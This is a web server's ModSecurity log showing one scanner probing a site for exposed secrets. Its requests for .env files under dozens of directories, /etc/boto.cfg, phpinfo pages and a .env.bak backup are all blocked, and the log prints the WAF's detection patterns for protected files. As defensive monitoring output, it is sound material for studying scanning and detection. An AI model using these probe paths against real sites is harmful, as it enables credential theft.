[Tue May 26 15:32:47.772369 2026] [security2:error] [pid 724639:tid 724769] [client 195.178.110.199:47166] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/erp/.env"] [unique_id "ahVvxxKJRbiNp3eWdT1txAAAAIU"]
[Tue May 26 15:32:47.954024 2026] [security2:error] [pid 724639:tid 724785] [client 110.224.167.133:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvxxKJRbiNp3eWdT1trQAAAJU"]
[Tue May 26 15:32:47.999533 2026] [security2:error] [pid 724639:tid 724828] [client 195.178.110.199:47304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/etc/boto.cfg"] [unique_id "ahVvxxKJRbiNp3eWdT1tzAAAAMA"]
[Tue May 26 15:32:48.026886 2026] [security2:error] [pid 724639:tid 724797] [client 195.178.110.199:47228] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/fe/.env"] [unique_id "ahVvyBKJRbiNp3eWdT1tzQAAAKE"]
[Tue May 26 15:32:48.150382 2026] [security2:error] [pid 724639:tid 724843] [client 195.178.110.199:47310] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/frontend/.env"] [unique_id "ahVvyBKJRbiNp3eWdT1t1QAAAM8"]
[Tue May 26 15:32:48.170634 2026] [security2:error] [pid 724639:tid 724782] [client 195.178.110.199:47262] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/info.php"] [unique_id "ahVvyBKJRbiNp3eWdT1t1wAAAJI"]
[Tue May 26 15:32:48.224024 2026] [security2:error] [pid 724639:tid 724866] [client 195.178.110.199:50512] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/infophp.php"] [unique_id "ahVvyBKJRbiNp3eWdT1t2QAAAOY"]
[Tue May 26 15:32:48.280748 2026] [security2:error] [pid 724639:tid 724886] [client 195.178.110.199:47254] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/infos.php"] [unique_id "ahVvyBKJRbiNp3eWdT1t4QAAAPo"]
[Tue May 26 15:32:48.320549 2026] [security2:error] [pid 724639:tid 724845] [client 195.178.110.199:47156] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/laravel/.env"] [unique_id "ahVvyBKJRbiNp3eWdT1t4wAAANE"]
[Tue May 26 15:32:48.333665 2026] [security2:error] [pid 724639:tid 724839] [client 195.178.110.199:47166] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/lms/.env"] [unique_id "ahVvyBKJRbiNp3eWdT1t5QAAAMs"]
[Tue May 26 15:32:48.389307 2026] [security2:error] [pid 724639:tid 724848] [client 195.178.110.199:50524] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/front/.env"] [unique_id "ahVvyBKJRbiNp3eWdT1t5wAAANQ"]
[Tue May 26 15:32:48.401616 2026] [security2:error] [pid 724639:tid 724803] [client 195.178.110.199:47144] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/local/.env"] [unique_id "ahVvyBKJRbiNp3eWdT1t6AAAAKc"]
[Tue May 26 15:32:48.567527 2026] [security2:error] [pid 724639:tid 724774] [client 195.178.110.199:47240] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/marketing/.env"] [unique_id "ahVvyBKJRbiNp3eWdT1t8gAAAIo"]
[Tue May 26 15:32:48.720760 2026] [security2:error] [pid 724639:tid 724800] [client 195.178.110.199:47156] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/new/.env"] [unique_id "ahVvyBKJRbiNp3eWdT1t_QAAAKQ"]
[Tue May 26 15:32:48.724129 2026] [security2:error] [pid 724639:tid 724889] [client 195.178.110.199:50460] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/node-api/.env"] [unique_id "ahVvyBKJRbiNp3eWdT1t_gAAAP0"]
[Tue May 26 15:32:48.733543 2026] [security2:error] [pid 724639:tid 724872] [client 195.178.110.199:47166] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/node/.env"] [unique_id "ahVvyBKJRbiNp3eWdT1uAAAAAOw"]
[Tue May 26 15:32:48.869291 2026] [security2:error] [pid 724639:tid 724804] [client 195.178.110.199:47156] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/media/.env"] [unique_id "ahVvyBKJRbiNp3eWdT1uAQAAAKg"]
[Tue May 26 15:32:49.007250 2026] [security2:error] [pid 724639:tid 724892] [client 195.178.110.199:47304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/node/api/.env"] [unique_id "ahVvyRKJRbiNp3eWdT1uDAAAAQA"]
[Tue May 26 15:32:49.014776 2026] [security2:error] [pid 724639:tid 724878] [client 195.178.110.199:47310] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/old/.env"] [unique_id "ahVvyRKJRbiNp3eWdT1uDQAAAPI"]
[Tue May 26 15:32:49.037356 2026] [security2:error] [pid 724639:tid 724812] [client 195.178.110.199:47144] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/node/backend/.env"] [unique_id "ahVvyRKJRbiNp3eWdT1uDwAAALA"]
[Tue May 26 15:32:49.039729 2026] [security2:error] [pid 724639:tid 724868] [client 195.178.110.199:47148] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/market/.env"] [unique_id "ahVvyRKJRbiNp3eWdT1uEAAAAOg"]
[Tue May 26 15:32:49.054567 2026] [security2:error] [pid 724639:tid 724837] [client 195.178.110.199:50524] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/nodeapi/.env"] [unique_id "ahVvyRKJRbiNp3eWdT1uEQAAAMk"]
[Tue May 26 15:32:49.325657 2026] [security2:error] [pid 724639:tid 724769] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvyBKJRbiNp3eWdT1uCQAAAIU"]
[Tue May 26 15:32:49.344680 2026] [security2:error] [pid 724639:tid 724818] [client 195.178.110.199:47228] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/nodeweb/.env"] [unique_id "ahVvyRKJRbiNp3eWdT1uIQAAALY"]
[Tue May 26 15:32:49.536164 2026] [security2:error] [pid 724639:tid 724858] [client 195.178.110.199:47272] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/php-info.php"] [unique_id "ahVvyRKJRbiNp3eWdT1uLAAAAN4"]
[Tue May 26 15:32:49.545147 2026] [security2:error] [pid 724639:tid 724894] [client 195.178.110.199:47166] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/php_info.php"] [unique_id "ahVvyRKJRbiNp3eWdT1uLgAAAQI"]
[Tue May 26 15:32:49.598418 2026] [security2:error] [pid 724639:tid 724801] [client 195.178.110.199:47148] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/phpinfo.php"] [unique_id "ahVvyRKJRbiNp3eWdT1uMAAAAKU"]
[Tue May 26 15:32:49.599176 2026] [security2:error] [pid 724639:tid 724854] [client 195.178.110.199:47240] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/opt/.env"] [unique_id "ahVvyRKJRbiNp3eWdT1uLwAAANo"]
[Tue May 26 15:32:49.748849 2026] [security2:error] [pid 724639:tid 724860] [client 195.178.110.199:47200] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/prod/.env"] [unique_id "ahVvyRKJRbiNp3eWdT1uOgAAAOA"]
[Tue May 26 15:32:49.845503 2026] [security2:error] [pid 724639:tid 724855] [client 195.178.110.199:47228] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/php.php"] [unique_id "ahVvyRKJRbiNp3eWdT1uPAAAANs"]
[Tue May 26 15:32:49.902892 2026] [security2:error] [pid 724639:tid 724889] [client 195.178.110.199:47200] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/project/.env"] [unique_id "ahVvyRKJRbiNp3eWdT1uQgAAAP0"]
[Tue May 26 15:32:49.957406 2026] [security2:error] [pid 724639:tid 724874] [client 195.178.110.199:50524] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/portal/.env"] [unique_id "ahVvyRKJRbiNp3eWdT1uRwAAAO4"]
[Tue May 26 15:32:49.975016 2026] [security2:error] [pid 724639:tid 724822] [client 195.178.110.199:47144] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/public/.env"] [unique_id "ahVvyRKJRbiNp3eWdT1uSAAAALo"]
[Tue May 26 15:32:49.990272 2026] [security2:error] [pid 724639:tid 724862] [client 195.178.110.199:50460] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/public/phpinfo.php"] [unique_id "ahVvyRKJRbiNp3eWdT1uSwAAAOI"]
[Tue May 26 15:32:50.052962 2026] [security2:error] [pid 724639:tid 724895] [client 195.178.110.199:47240] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/public_html/.env"] [unique_id "ahVvyhKJRbiNp3eWdT1uUQAAAQM"]
[Tue May 26 15:32:50.107517 2026] [security2:error] [pid 724639:tid 724857] [client 195.178.110.199:47182] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/product/.env"] [unique_id "ahVvyhKJRbiNp3eWdT1uUwAAAN0"]
[Tue May 26 15:32:50.779492 2026] [security2:error] [pid 724639:tid 724834] [client 195.178.110.199:47214] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/public-api/.env"] [unique_id "ahVvyhKJRbiNp3eWdT1uawAAAMY"]
[Tue May 26 15:32:51.707133 2026] [security2:error] [pid 724639:tid 724830] [client 195.178.110.199:47286] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/qa/.env"] [unique_id "ahVvyxKJRbiNp3eWdT1uiAAAAMI"]
[Tue May 26 15:32:51.842904 2026] [security2:error] [pid 724639:tid 724892] [client 195.178.110.199:47156] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/production/.env"] [unique_id "ahVvyxKJRbiNp3eWdT1ujwAAAQA"]
[Tue May 26 15:32:51.920924 2026] [security2:error] [pid 724639:tid 724795] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvyxKJRbiNp3eWdT1ufQAAAJ8"]
[Tue May 26 15:32:51.932638 2026] [security2:error] [pid 724639:tid 724887] [client 47.128.47.128:22248] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cicodev.org"] [uri "/en/medias/674-a-tiny-african-island-nation-will-run-on-100-renewable-energy-in-less-than-a-decade"] [unique_id "ahVvyxKJRbiNp3eWdT1ukwAAAPs"]
[Tue May 26 15:32:52.849370 2026] [security2:error] [pid 724639:tid 724884] [client 195.178.110.199:47302] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/s3/.env.bak"] [unique_id "ahVvzBKJRbiNp3eWdT1uvwAAAPg"]
